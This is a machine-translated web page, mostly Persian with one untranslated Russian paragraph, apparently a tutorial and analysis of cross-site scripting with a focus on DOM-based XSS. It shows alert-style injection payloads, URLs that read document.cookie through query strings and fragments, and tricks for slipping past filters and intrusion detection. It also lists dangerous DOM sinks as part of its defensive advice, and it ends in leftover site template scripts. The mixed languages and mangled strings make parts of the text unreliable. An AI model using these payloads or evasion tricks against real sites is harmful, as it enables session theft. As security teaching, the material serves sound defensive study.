وردپرس (به دلیل اینکه مدیر وب‌سایت تغییراتی در کد منبع ایجاد کرده است) و نه افزونه‌ها و تم‌ها (معمولاً اینها افزونه‌ها و تم‌های غیرقانونی هستند) را به روز نمی‌کنند. اما اگر در حال خواندن این بخش هستید و چیز جدیدی از آن یاد می‌گیرید، پس وردپرس هنوز برای شما مناسب نیست... قطعاً بعداً به آن باز خواهیم گشت.</p> <p>بهترین اهداف، انواع موتورها و اسکریپت های خودنویس هستند.</p> <p>شما می توانید به عنوان محموله برای درج انتخاب کنید</p><p> <script>alert(1)</script> </p><p>توجه داشته باشید که کد تعبیه شده شما در کدام تگ های کد HTML قرار می گیرد. در اینجا یک مثال از یک فیلد ورودی معمولی ( <b>ورودی</b>):</p><p> <input type="text" class="ui-input query" name="q" value="روبالشی"/><script>alert(1)</script><input value="" /> </p><p>بار ما به جایی خواهد رفت که کلمه "روبالشی" اکنون وجود دارد. آن ها تبدیل به ارزش برچسب <b>ورودی</b>. ما می توانیم از آن اجتناب کنیم - بیایید ببندیم <a href="https://bar812.ru/fa/escape-simvol-dvoinoi-kavychki-v-xml-moi-lyubimyi-sposob.html">نقل قول دوگانه</a>و سپس خود تگ با <b>"/> </b></p> <p> "/><script>alert(1)</script> </p><p>بیایید آن را برای برخی از سایت ها امتحان کنیم:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/101.jpg' width="100%" loading=lazy loading=lazy></p> <p>خوب، یک آسیب پذیری وجود دارد.</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/102.jpg' width="100%" loading=lazy loading=lazy></p> <h2>برنامه هایی برای یافتن و اسکن آسیب پذیری های XSS <br></h2> <p>احتمالاً همه اسکنرهای برنامه های وب دارای یک اسکنر آسیب پذیری داخلی XSS هستند. به این موضوع پرداخته نشده است، بهتر است با هر یک از این اسکنرها به طور جداگانه آشنا شوید.</p> <p>همه ما می دانیم که اسکریپت بین سایتی چیست، درست است؟ این یک آسیب‌پذیری است که در آن یک مهاجم داده‌های مخرب (معمولاً HTML حاوی کد جاوا اسکریپت) را ارسال می‌کند که بعداً توسط برنامه بازگردانده می‌شود و باعث می‌شود کد جاوا اسکریپت اجرا شود. پس این درست نیست! نوعی از حمله XSS وجود دارد که حداقل در اصول اولیه با این تعریف مطابقت ندارد. حملات XSS، همانطور که در بالا تعریف شد، به دو دسته فوری (داده های مخرب در صفحه تعبیه شده است که بلافاصله پس از درخواست به مرورگر بازگردانده می شود) و تاخیری (داده های مخرب پس از مدتی برگردانده می شوند) تقسیم می شوند. اما نوع سومی از حمله XSS وجود دارد که مبتنی بر ارسال داده های مخرب به سرور نیست. اگرچه به نظر می رسد خلاف واقع باشد، اما دو نمونه مستند از چنین حمله ای وجود دارد. این مقاله نوع سوم حملات XSS - XSS از طریق DOM (DOM Based XSS) را شرح می‌دهد. هیچ چیز اساسی در مورد حمله در اینجا نوشته نخواهد شد، بلکه نوآوری این مواد در برجسته کردن ویژگی های متمایز حمله است که بسیار مهم و جالب است.</p> <p>توسعه دهندگان و کاربران برنامه های کاربردی باید اصول حمله XSS از طریق DOM را درک کنند، زیرا تهدیدی برای <a href="https://bar812.ru/fa/prilozhenie-b-sozdanie-shablonov-web-uzla-shablony-dlya-sozdaniya-web-uzlov-chto.html">برنامه های کاربردی وب</a>و با XSS معمولی متفاوت است. برنامه های وب زیادی در اینترنت وجود دارند که از طریق DOM در برابر XSS آسیب پذیر هستند و در عین حال برای XSS آزمایش شده و در برابر این نوع حمله "ایمن" شده اند. توسعه‌دهندگان و مدیران سایت باید با روش‌هایی برای شناسایی و محافظت در برابر XSS از طریق DOM آشنا شوند، زیرا این تکنیک‌ها با تکنیک‌هایی که هنگام برخورد با آسیب‌پذیری‌های استاندارد XSS استفاده می‌شوند، متفاوت است.</p> <h3>مقدمه</h3> <p>خواننده باید با اصول اولیه حملات XSS (, , , , ) آشنا باشد. XSS معمولاً به اسکریپت نویسی فوری () و تأخیر بین سایت اشاره دارد. با XSS فوری، کد مخرب (جاوا اسکریپت) توسط سرور مورد حمله بلافاصله به عنوان پاسخ به درخواست HTTP بازگردانده می شود. تاخیر در XSS به این معنی است که کد مخرب در سیستم مورد حمله ذخیره می شود و می تواند بعداً به آن تزریق شود. <a href="https://bar812.ru/fa/grafika-na-web-stranice-v-html-dobavlyaem-izobrazheniya-na-web-stranicu-a-eshche.html">صفحه HTML</a>سیستم آسیب پذیر همانطور که در بالا ذکر شد، این طبقه بندی فرض می کند که یک ویژگی اساسی XSS این است که کدهای مخرب از مرورگر به سرور ارسال می شود و به همان مرورگر (XSS فوری) یا هر مرورگر دیگری (XSS تاخیری) بازگردانده می شود. این مقاله این موضوع را مطرح می کند که این یک طبقه بندی اشتباه است. احتمال حمله XSS که متکی به تزریق کد به صفحه بازگردانده شده توسط سرور نباشد، تأثیر زیادی بر روش‌های حفاظت و شناسایی خواهد داشت. اصول چنین حملاتی در این مقاله مورد بحث قرار گرفته است.</p> <h3>مثال و نظرات</h3> <p>قبل از توصیف ساده‌ترین سناریوی حمله، مهم است که تأکید کنیم روش‌های توصیف‌شده در اینجا قبلاً بارها به صورت عمومی نشان داده شده‌اند (به عنوان مثال، و ). من ادعا نمی کنم که روش های زیر برای اولین بار توضیح داده شده است (اگرچه برخی از آنها با مطالب منتشر شده قبلی متفاوت هستند).</p> <p>نشانه‌ای از یک سایت آسیب‌پذیر، وجود یک صفحه HTML است که از داده‌های document.location، document.URL یا document.referrer (یا هر شی دیگری که مهاجم می‌تواند بر آن تأثیر بگذارد) به روشی ناامن استفاده می‌کند.</p> <p>یادداشت برای خوانندگانی که با اینها آشنا نیستند <a href="https://bar812.ru/fa/prodvinutaya-rabota-s-obektom-event-na-javascript-vvedenie-v-vsplyvayushchie-sobytiya.html">اشیاء جاوا اسکریپت</a>: هنگامی که کد جاوا اسکریپت در مرورگر اجرا می شود، به چندین شی که در DOM نشان داده شده است (مدل شیء سند -) دسترسی پیدا می کند. <a href="https://bar812.ru/fa/osnovy-raboty-s-dom-v-javascript-rabota-s-dom-modelyu-obektnaya-model-dom.html">مدل شی</a>سند). آبجکت document مهمترین این اشیا است و دسترسی به اکثر خصوصیات صفحه را فراهم می کند. این شی شامل بسیاری از اشیاء تو در تو مانند مکان، URL و ارجاع دهنده است. آنها با توجه به دیدگاه مرورگر توسط مرورگر مدیریت می شوند (این بسیار مهم است، همانطور که در زیر مشاهده خواهد شد). بنابراین document.URL و document.location حاوی URL صفحه هستند، یا بهتر بگوییم منظور مرورگر از URL چیست. توجه داشته باشید که این اشیاء از بدنه صفحه HTML گرفته نشده اند. شی سند حاوی یک شی بدنه حاوی کد HTML تجزیه شده برای صفحه است.</p> <p>یافتن یک صفحه HTML که حاوی کد جاوا اسکریپت باشد که رشته URL را تجزیه کند (از طریق document.URL یا document.location به آن دسترسی داشته باشد) و برخی از اقدامات سمت سرویس گیرنده را بر اساس مقدار آن انجام دهد، سخت نیست. در زیر نمونه ای از این کدها آورده شده است.</p> <p>با قیاس با مثال در c، صفحه HTML زیر را در نظر بگیرید (فرض کنید که این محتوا است <span>http://www.vulnerable.site/welcome.html</span>):</p> <p><HTML> <TITLE>خوش آمدی!</TITLE>سلام<SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR>به سیستم ما خوش آمدید…</HTML></p> <p>با این حال، یک پرس و جو مانند این -</p> <p>http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script></p> <p>با XSS تماس می گیرد. بیایید ببینیم چرا: مرورگر قربانی که این پیوند را دریافت کرده است، یک درخواست HTTP به www.vulnerable.site ارسال می کند و صفحه HTML (ایستا!) بالا را دریافت می کند. مرورگر قربانی شروع به تجزیه این کد HTML می کند. DOM حاوی یک شی سند است که دارای یک فیلد URL است و آن فیلد با مقدار URL پر شده است <a href="https://bar812.ru/fa/gde-hranyatsya-kuki-v-hrome-gde-chrome-hranit-kuki-prosmotr-cookie-dlya.html">صفحه فعلی</a>در این فرآیند <a href="https://bar812.ru/fa/sozdanie-dom-uzlov-s-pomoshchyu-js-udalit---kak-vstavit-element-posle-drugogo.html">ایجاد DOM</a>. هنگامی که تجزیه کننده به کد جاوا اسکریپت می رسد، آن را اجرا می کند که باعث می شود کد HTML صفحه رندر شده اصلاح شود. در این حالت کد به document.URL اشاره می کند و از آنجایی که بخشی از این رشته در حین تجزیه در HTML جاسازی شده است که بلافاصله تجزیه می شود، کد شناسایی شده (هشدار(…)) در زمینه همان صفحه اجرا می شود.</p> <p>یادداشت:</p> <p>1. کدهای مخرب در صفحه HTML تعبیه نشده است (برخلاف سایر اشکال XSS). <br>2. این اکسپلویت تا زمانی کار خواهد کرد که مرورگر کاراکترهای URL را تغییر ندهد. موزیلا به طور خودکار " را رمزگذاری می کند<’ и ‘>' (به ترتیب در %3C و %3E) در سند تودرتو. اگر URL مستقیماً در نوار آدرس تایپ شده باشد، آن مرورگر در برابر حمله توصیف شده در این مثال مصون است. با این حال، اگر حمله به «<’ и ‘>(در شکل رمزگذاری نشده اصلی آن) حمله می تواند انجام شود. مایکروسافت <a href="https://bar812.ru/fa/pereustanovka-internet-explorer-v-windows-10-vosstanovlenie-internet-explorer.html">اینترنت اکسپلورر</a> 6.0 کد نمی کند<’ и ‘>و بنابراین بدون هیچ محدودیتی در برابر حمله توصیف شده آسیب پذیر است. با این حال، سناریوهای مختلف حمله زیادی وجود دارد که نیازی به «<’ и ‘>و بنابراین حتی موزیلا نیز از این حمله مصون نیست.</p> <h3>روش هایی برای تشخیص و پیشگیری از آسیب پذیری های این نوع</h3> <p>در مثال بالا، کد مخرب همچنان به سرور ارسال می شود (به عنوان بخشی از درخواست HTTP)، بنابراین حمله می تواند مانند هر حمله XSS دیگری شناسایی شود. اما این یک مشکل قابل حل است.</p> <p>به مثال زیر توجه کنید:</p> <p>http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie)<script></p> <p>Обратите внимание на символ ‘#’ справа от имени файла. Он говорит браузеру, что все после этого символа не является частью запроса. Microsoft Internet Explorer (6.0) и Mozilla не отправляет фрагмент после символа ‘#’ на сервер, поэтому для сервера этот запрос будет эквивалентен http://www.vulnerable.site/welcome.html, т.е. злонамеренный код даже не будет замечен сервером. Таким образом, благодаря этому приему, браузер не отправляет злонамеренную полезную нагрузку на сервер.</p> <p>Но все же в некоторых случаях невозможно скрыть полезную нагрузку: в и злонамеренная полезная нагрузка является частью имени пользователи (username) в URL типа http://username@host/. В этом случае браузер отправляет запрос с заголовком Authorization, содержащий имя пользователи (злонамеренная полезная нагрузка), в результате чего злонамеренный код попадает на сервер (закодированный с помощью Base64 – следовательно IDS/IPS для обнаружения атаки должны вначале декодировать эти данные). Однако сервер не обязан внедрять эту полезную нагрузку в одну из доступных HTML страниц, хотя это является необходимым условием выполнения XSS атаки.</p> <p>Очевидно, что в ситуациях, когда полезная нагрузка может быть полностью скрыта, средства обнаружения (IPS) и предотвращения (IPS, межсетевые экраны для web приложений) не могут полностью защитить от этой атаки. Даже если полезную нагрузку нужно отсылать на сервер, во многих случаях для избежания обнаружения она может быть преобразована определенным образом. Например, если какой-то параметр защищен (к примеру, параметр name в примере выше), небольшое изменение сценария атаки может принести результат:</p> <p><script>(document.cookie)</script></p> <p>یک سیاست امنیتی سخت‌گیرانه‌تر مستلزم ارسال پارامتر نام است. در این صورت می توانید درخواست زیر را ارائه دهید:</p> <p>http://www.vulnerable.site/welcome.html?notname= <script>هشدار (document.cookie) <script>&name=جو</p> <p>اگر خط مشی امنیتی نام پارامترهای اضافی را محدود می کند (به عنوان مثال: foobar)، می توانید از گزینه زیر استفاده کنید:</p> <p>http://www.vulnerable.site/welcome.html?foobar=name= <script>هشدار (document.cookie) <script>&name=جو</p> <p>توجه داشته باشید که پارامتر نادیده گرفته شده (foobar) باید اول باشد و مقدار بار را در خود داشته باشد.</p> <p>سناریوی حمله شرح داده شده در، حتی برای مهاجم ارجح تر است، زیرا ارزش کامل document.location در صفحه HTML نوشته شده است (کد جاوا اسکریپت نام پارامتر خاصی را جستجو نمی کند). بنابراین، یک مهاجم می‌تواند با ارسال موارد زیر، محموله را کاملاً مخفی کند:</p> <p>/attachment.cgi?id=&action=foobar#<script>alert(document.cookie)</script></p> <p>حتی اگر بار توسط سرور تجزیه شود، حفاظت تنها در صورتی می تواند تضمین شود که درخواست رد شود یا پاسخ با متن خطا جایگزین شود. ارجاع مجدد به و : اگر هدر Authorization به سادگی توسط سیستم امنیتی میانی حذف شود، اگر صفحه اصلی بازگردانده شود، هیچ تاثیری نخواهد داشت. به همین ترتیب، هرگونه تلاش برای پردازش داده ها بر روی سرور، با حذف یا رمزگذاری کاراکترهای غیرقانونی، در برابر این حمله بی اثر خواهد بود.</p> <p>در مورد document.referrer، payload از طریق هدر Referer به سرور ارسال می شود. با این حال، اگر مرورگر کاربر یا محافظ میانی کاربر این هدر را حذف کند، هیچ اثری از حمله ای که می تواند کاملاً نادیده گرفته شود وجود نخواهد داشت.</p> <p>با جمع بندی نتیجه می گیریم که <a href="https://bar812.ru/fa/bannernaya-reklama-sozdat-sozdat-banner-besplatno-onlain.html">روش های سنتی</a>، برای مثال</p> <p>1. رمزگذاری داده های HTML در سمت سرور <br>2. حذف/رمزگذاری ورودی های ممنوعه در سمت سرور در برابر DOM XSS کار نمی کند.</p> <p>جستجوی خودکار آسیب‌پذیری‌ها با بمباران با داده‌های مخرب (گاهی اوقات به نام fuzzing) کار نخواهد کرد، زیرا برنامه‌هایی که از این تکنیک استفاده می‌کنند معمولاً استنباط می‌کنند که آیا داده‌های تعبیه‌شده در صفحه برگشتی وجود دارد یا نه (به‌جای اجرای کد در زمینه مرورگر در سمت کلاینت و نظارت. نتایج). با این حال، اگر برنامه بتواند کد جاوا اسکریپت موجود در صفحه را به صورت ایستا تجزیه کند، ممکن است نشانه های مشکوکی را نشان دهد (به زیر مراجعه کنید). و البته، اگر ابزارهای امنیتی بتوانند کد جاوا اسکریپت را اجرا کنند (و اشیاء DOM را به درستی مقداردهی اولیه کنند) یا چنین اجرایی را شبیه سازی کنند، می توانند این حمله را شناسایی کنند.</p> <p>جستجوی دستی آسیب‌پذیری با استفاده از مرورگر نیز کار خواهد کرد، زیرا مرورگر می‌تواند کد جاوا اسکریپت سمت کلاینت را اجرا کند. آسیب پذیرها می توانند از این روش بهره ببرند و کد سمت کلاینت را برای نظارت بر نتایج اجرای آن اجرا کنند. <br>حفاظت موثر</p> <p>از بازنویسی، تغییر مسیر یا اقدامات مشابهی که از داده های سمت سرویس گیرنده استفاده می کنند، خودداری کنید. اکثر این اقدامات را می توان با استفاده از آن انجام داد <a href="https://bar812.ru/fa/dinamicheskaya-zagruzka-stranicy-lenivaya-zagruzka-kontenta-na-lendinge.html">صفحات پویا</a>(در سمت سرور). <br> 2.</p> <p>تجزیه و تحلیل و بهبود امنیت کد (جاوا اسکریپت) در سمت مشتری. ارجاع به اشیاء DOM که می تواند توسط کاربر (مهاجم) تحت تأثیر قرار گیرد باید به دقت بررسی شود. توجه ویژه باید به موارد زیر شود (اما نه محدود به): <br>*document.URL <br>*document.URLUnecoded <br>* document.location (و خصوصیات آن) <br>*سند.ارجاع دهنده <br>* window.location (و خصوصیات آن)</p> <p>توجه داشته باشید که ویژگی های سند و اشیاء پنجره را می توان به چندین روش ارجاع داد: به طور صریح (مثال window.location)، به طور ضمنی (مثال مکان) یا با گرفتن یک دسته و استفاده از آن (به عنوان مثال handle_to_some_window.location).</p> <p>توجه ویژه ای باید به کدهایی که DOM در حال تغییر است، به طور صریح یا بالقوه، و از طریق دسترسی مستقیم به HTML یا از طریق دسترسی مستقیم به DOM معطوف شود. مثال ها (این به هیچ وجه یک لیست جامع نیست): <br>* وارد کردن کد HTML صفحه: <br>o document.write(…) <br>o document.writeln(…) <br>o document.body.innerHtml=… <br>* DOM را مستقیماً تغییر دهید (از جمله رویدادهای DHTML): <br>o document.forms.action=… (و سایر تغییرات) <br>document.attachEvent (…) <br>o document.create…(…) <br>document.execCommand (…) <br>o سند.بدنه. ... (دسترسی به DOM از طریق جسم بدن) <br>window.attachEvent (…) <br>* تغییر URL سند: <br>o document.location=… (و همچنین تنظیم مقادیر href، host و hostname شی موقعیت مکانی) <br>document.location.hostname=… <br>o document.location.replace(...) <br>document.location.assign(…) <br>document.URL=… <br>window.navigate(…) <br>* باز کردن/تغییر شی پنجره: <br>o document.open(…) <br>window.open(…) <br>o window.location.href=… (و همچنین تنظیم میزبان و نام میزبان شی مکان) <br>* اجرای مستقیم اسکریپت: <br>ارزشیابی (…) <br>window.execScript(...) <br>window.setInterval(…) <br>window.setTimeout (…)</p> <p>در ادامه مثال بالا، برای محافظت موثر، اسکریپت اصلی را می توان با کد زیر جایگزین کرد، که رشته نوشته شده در صفحه HTML را فقط برای کاراکترهای الفبایی عددی بررسی می کند.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </div> </div> <div class="td-pb-span4 td-main-sidebar" role="complementary"> <div class="td-ss-main-sidebar"> </div> </div> </div> </div> </article> <script type="text/javascript"> try { var sbmt = document.getElementById('submit'), npt = document.createElement('input'), d = new Date(), __ksinit = function() { sbmt.parentNode.insertBefore(npt, sbmt); }; npt.value = d.getUTCDate() + '' + (d.getUTCMonth() + 1) + 'uniq9065'; npt.name = 'ksbn_code'; npt.type = 'hidden'; sbmt.onmousedown = __ksinit; sbmt.onkeypress = __ksinit; } catch (e) {} </script> <div class="td-sub-footer-container td-container-wrap "> <div class="td-container "> <div class="td-pb-row "> <div class="td-pb-span td-sub-footer-menu "></div> <div class="td-pb-span td-sub-footer-copy ">2022 bar812.ru. فقط در مورد مجتمع برنامه ها. اهن. اینترنت. پنجره ها</div> </div> </div> </div> </div> <script data-cfasync="false" type="text/javascript"> if (window.addthis_product === undefined) { window.addthis_product = "wpwt"; } if (window.wp_product_version === undefined) { window.wp_product_version = "wpwt-3.1.2"; } if (window.wp_blog_version === undefined) { window.wp_blog_version = "4.9.1"; } if (window.addthis_share === undefined) { window.addthis_share = {}; } if (window.addthis_config === undefined) { window.addthis_config = { "data_track_clickback": true, "ui_language": "ru", "ui_atversion": "300" }; } if (window.addthis_plugin_info === undefined) { window.addthis_plugin_info = { "info_status": "enabled", "cms_name": "WordPress", "plugin_name": "Website Tools by AddThis", "plugin_version": "3.1.2", "plugin_mode": "AddThis", "anonymous_profile_id": "wp-f2d21fd70bfc0c32605b4e5e1e4ff912", "page_info": { "template": "posts", "post_type": "" }, "sharing_enabled_on_post_via_metabox": false }; } (function() { var first_load_interval_id = setInterval(function() { if (typeof window.addthis !== 'undefined') { window.clearInterval(first_load_interval_id); if (typeof window.addthis_layers !== 'undefined' && Object.getOwnPropertyNames(window.addthis_layers).length > 0) { window.addthis.layers(window.addthis_layers); } if (Array.isArray(window.addthis_layers_tools)) { for (i = 0; i < window.addthis_layers_tools.length; i++) { window.addthis.layers(window.addthis_layers_tools[i]); } } } }, 1000) }()); </script> <script type='text/javascript'> var tocplus = { "smooth_scroll": "1", "visibility_show": "\u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c", "visibility_hide": "\u0441\u043a\u0440\u044b\u0442\u044c", "width": "Auto" }; </script> <script type='text/javascript' src='https://bar812.ru/wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=bbebb9a04042e1d7d3625bab0b5e9e4f'></script> <script> (function() { var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = '/wp-content/themes/Newspaper/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = '/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm, ''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> <div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar"> <header> <a title="ویرایشگر" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">با Live CSS ویرایش کنید</a> <div class="tdw-less-info" title="هنگامی که خطا در CSS و LESS شما شناسایی شود، قرمز خواهد بود"></div> </header> <div class="tdw-content"> <div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active"> <script> (function(jQuery, undefined) { jQuery(window).ready(function() { if ('undefined' !== typeof tdcAdminIFrameUI) { var $liveIframe = tdcAdminIFrameUI.getLiveIframe(); if ($liveIframe.length) { $liveIframe.load(function() { $liveIframe.contents().find('body').append('<textarea class="tdw-css-writer-editor" style="display: none"></textarea>'); }); } } }); })(jQuery); </script> <textarea class="tdw-css-writer-editor td_live_css_uid_1_5a5dc1e76f1d6"></textarea> <div id="td_live_css_uid_1_5a5dc1e76f1d6" class="td-code-editor"></div> <script> jQuery(window).load(function() { if ('undefined' !== typeof tdLiveCssInject) { tdLiveCssInject.init(); var editor_textarea = jQuery('.td_live_css_uid_1_5a5dc1e76f1d6'); var languageTools = ace.require("ace/ext/language_tools"); var tdcCompleter = { getCompletions: function(editor, session, pos, prefix, callback) { if (prefix.length === 0) { callback(null, []); return } if ('undefined' !== typeof tdcAdminIFrameUI) { var data = { error: undefined, getShortcode: '' }; tdcIFrameData.getShortcodeFromData(data); if (!_.isUndefined(data.error)) { tdcDebug.log(data.error); } if (!_.isUndefined(data.getShortcode)) { var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g, results = data.getShortcode.match(regex); var elClasses = {}; for (var i = 0; i < results.length; i++) { var currentClasses = results[i] .replace('el_class="', '') .replace('"', '') .split(' '); for (var j = 0; j < currentClasses.length; j++) { if (_.isUndefined(elClasses[currentClasses[j]])) { elClasses[currentClasses[j]] = ''; } } } var arrElClasses = []; for (var prop in elClasses) { arrElClasses.push(prop); } callback(null, arrElClasses.map(function(item) { return { name: item, value: item, meta: 'in_page' } })); } } } }; languageTools.addCompleter(tdcCompleter); window.editor = ace.edit("td_live_css_uid_1_5a5dc1e76f1d6"); // 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook) // We did it to reattach the existing compiled css to the new content received from server. window.editorChangeHandler = function() { //tdwState.lessWasEdited = true; window.onbeforeunload = function() { if (tdwState.lessWasEdited) { return "You have attempted to leave this page. Are you sure?"; } return false; }; var editorValue = editor.getSession().getValue(); editor_textarea.val(editorValue); if ('undefined' !== typeof tdcAdminIFrameUI) { tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue); // Mark the content as modified // This is important for showing info when composer closes tdcMain.setContentModified(); } tdLiveCssInject.less(); }; editor.getSession().setValue(editor_textarea.val()); editor.getSession().on('change', editorChangeHandler); editor.setTheme("ace/theme/textmate"); editor.setShowPrintMargin(false); editor.getSession().setMode("ace/mode/less"); editor.setOptions({ enableBasicAutocompletion: true, enableSnippets: true, enableLiveAutocompletion: false }); } }); </script> </div> </div> <footer> <a href="#" class="tdw-save-css">صرفه جویی</a> <div class="tdw-more-info-text">CSS OR LESS را بنویسید و save را بزنید. CTRL + SPACE برای تکمیل خودکار.</div> <div class="tdw-resize"></div> </footer> </div> <script type="text/javascript" defer src="https://bar812.ru/wp-content/cache/autoptimize/js/autoptimize_d85127d8732b44d62e81e0455b3d3cb7.js"></script> </body> </html>